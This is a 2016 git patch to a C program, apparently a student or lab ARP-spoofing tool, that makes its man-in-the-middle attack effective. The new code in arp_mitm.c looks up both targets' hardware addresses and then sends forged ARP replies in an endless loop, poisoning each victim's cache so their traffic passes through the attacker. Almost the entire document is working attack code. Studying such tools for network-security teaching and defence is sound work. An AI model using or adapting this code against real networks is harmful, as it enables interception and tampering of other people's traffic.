From f8320a04ce735976f90fea96aa1b84c5a71bc9ec Mon Sep 17 00:00:00 2001
From: Dimitri Lozeve <delta.lozeve@gmail.com>
Date: Fri, 27 May 2016 16:21:09 +0200
Subject: [PATCH] Effective man-in-the-middle attack using replies

---
 arp.c      |  6 +-----
 arp_mitm.c | 21 +++++++++++++++++++--
 2 files changed, 20 insertions(+), 7 deletions(-)

diff --git a/arp.c b/arp.c
index 5c2278a..1f2b27c 100644
--- a/arp.c
+++ b/arp.c
@@ -183,13 +183,9 @@ int send_arp_reply(int sockfd, int ifindex, struct sockaddr_in *sender_ip, unsig
  */
 int listen_arp_frame(int sockfd, struct ether_arp *result)
 {
-
-  char buffer[10000];
-  result = (struct ether_arp *)buffer;
-
   int count = 0;
   
-  while (recv(sockfd, buffer, sizeof(buffer), 0) && count < 10) {
+  while (recv(sockfd, result, sizeof(struct ether_arp), 0) && count < 20) {
     /* skip to the next frame if it's not an ARP REPLY */
     if (ntohs (result->arp_op) != ARPOP_REPLY) {
       ++count;
diff --git a/arp_mitm.c b/arp_mitm.c
index c9cec07..c643263 100644
--- a/arp_mitm.c
+++ b/arp_mitm.c
@@ -121,10 +121,27 @@ int main(int argc, char **argv)
 
   /* ====================================================================== */
 
+  send_arp_request(sockfd, ifindex, ipaddr2, macaddr, target1_ip);
+
+  struct ether_arp reply1;
+  listen_arp_frame(sockfd, &reply1);
+  unsigned char *macaddr1 = reply1.arp_sha;
+  printf("Target 1 hardware address: %02x:%02x:%02x:%02x:%02x:%02x\n",
+    	 macaddr1[0],macaddr1[1],macaddr1[2],
+    	 macaddr1[3],macaddr1[4],macaddr1[5]);
+
+  send_arp_request(sockfd, ifindex, ipaddr1, macaddr, target2_ip);
+  struct ether_arp reply2;
+  listen_arp_frame(sockfd, &reply2);
+  unsigned char *macaddr2 = reply2.arp_sha;
+  printf("Target 2 hardware address: %02x:%02x:%02x:%02x:%02x:%02x\n",
+    	 macaddr2[0],macaddr2[1],macaddr2[2],
+    	 macaddr2[3],macaddr2[4],macaddr2[5]);
+
   while(1) {
-    send_arp_request(sockfd, ifindex, ipaddr1, macaddr, target2_ip);
+    send_arp_reply(sockfd, ifindex, ipaddr1, macaddr, target2_ip, macaddr2);
     sleep(1);
-    send_arp_request(sockfd, ifindex, ipaddr2, macaddr, target1_ip);
+    send_arp_reply(sockfd, ifindex, ipaddr2, macaddr, target1_ip, macaddr1);
     sleep(1);
   }